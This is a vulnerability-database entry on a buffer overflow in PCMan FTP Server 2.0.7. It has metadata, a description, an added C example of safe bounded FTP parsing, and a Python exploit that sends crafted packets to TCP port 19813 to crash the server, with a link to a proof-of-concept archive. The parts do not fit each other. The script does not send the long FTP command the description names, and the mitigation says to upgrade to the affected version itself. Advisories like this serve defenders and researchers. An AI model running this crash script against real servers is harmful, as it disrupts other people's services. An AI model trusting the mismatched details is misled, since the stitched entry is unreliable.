Vendor: PCMan FTP Server
By: Exploit-DB
CVSS: 9.3 (HIGH)
Type: Buffer Overflow
CWE: 120
Product Name: PCMan FTP Server
Affected Version From: 2.0.7
Affected Version To: 2.0.7
Patch Exists: YES
Related CVE: CVE-2008-4194
CPE: a:hk_pcman:pcman_ftp_server
Platforms Tested: Windows
2008

Remote Buffer Overflow in PCMan FTP Server 2.0.7

A remote buffer overflow vulnerability exists in PCMan FTP Server 2.0.7. It is caused by a boundary error in the handling of FTP commands: sending an overly long, specially crafted FTP command to the affected server causes a stack-based buffer overflow. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to version 2.0.7 or later.
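
The bug class described above (CWE-120, an FTP command copied into a fixed stack buffer without a length check) next to a bounds-checked parser, as an added example that is not PCMan's code and not part of the Exploit-DB entry. The buffer sizes, the function name ftp_parse_line and the return codes are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define FTP_VERB_MAX 8    /* assumed size of the verb buffer */
#define FTP_ARG_MAX  256  /* assumed size of the argument buffer */

enum ftp_parse { FTP_OK = 0, FTP_TOO_LONG = -1, FTP_MALFORMED = -2 };

/* Unsafe pattern (CWE-120): char arg[256]; strcpy(arg, line_from_socket);
 * Hardened form: split "VERB[ SP arg]CRLF" into fixed buffers, checking
 * every length before any byte is copied. Names here are hypothetical. */
static enum ftp_parse ftp_parse_line(const char *line, size_t len,
                                     char *verb, char *arg)
{
    /* Drop the trailing CR/LF so it does not count against the limits. */
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;
    /* Empty lines and embedded NULs are rejected outright. */
    if (len == 0 || memchr(line, '\0', len) != NULL)
        return FTP_MALFORMED;

    const char *sp = memchr(line, ' ', len);
    size_t vlen = sp ? (size_t)(sp - line) : len;
    size_t alen = sp ? len - vlen - 1 : 0;

    if (vlen == 0)
        return FTP_MALFORMED;
    /* ">=" leaves room for the terminating NUL in each buffer. */
    if (vlen >= FTP_VERB_MAX || alen >= FTP_ARG_MAX)
        return FTP_TOO_LONG;   /* caller should reply 500 and drop the line */

    memcpy(verb, line, vlen);
    verb[vlen] = '\0';
    if (alen > 0)
        memcpy(arg, sp + 1, alen);
    arg[alen] = '\0';
    return FTP_OK;
}

int main(void)
{
    char verb[FTP_VERB_MAX], arg[FTP_ARG_MAX];
    char big[4096];                 /* constructed oversized command */
    memset(big, 'A', sizeof big);
    memcpy(big, "USER ", 5);
    printf("normal:    %d\n", ftp_parse_line("USER anonymous\r\n", 16, verb, arg));
    printf("oversized: %d\n", ftp_parse_line(big, sizeof big, verb, arg));
    return 0;
}
```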

Exploit-DB raw data:

#!/usr/bin/python

import socket,struct,sys,os

SIGN=0x04030201
cmd=0x01000000

def main():
	if len(sys.argv)!=2:
		print"\n[x] Usage: python "+sys.argv[0]+" < ip_server >\n"
		sys.exit(0)
	
	else:
		host=sys.argv[1],19813	#default port TCP/19813

	if sys.platform=="win32":
	    os.system("cls")
	else:
	    os.system("clear")
	
	s=socket.socket()
	try:
		s.connect(host)
		s.recv(1024)
	except:
		print"[x] Error connecting to remote host! This is g00d :D."
		sys.exit(0)
	print"[+] Building crafted packets..."
	#packet negotiation request
	pktnego=struct.pack(">L",cmd+0x1)		#+0
	pktnego+=struct.pack("<L",0x00000000)		#+4
	pktnego+=struct.pack("<L",SIGN)			#+8 (signature)
	#packet crash
	pkt1=struct.pack("<L",cmd+0x2)
	pkt1+=struct.pack(">L",0x00000001)		# != 0x0
	pkt1+=struct.pack("<L",SIGN)
	#end	
	print"[+] Negotiation."
	s.send(pktnego)
	s.recv(1024)
	s.send(pkt1)#crash!
	s.close()

if __name__=="__main__":
	main()
#PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15214.zip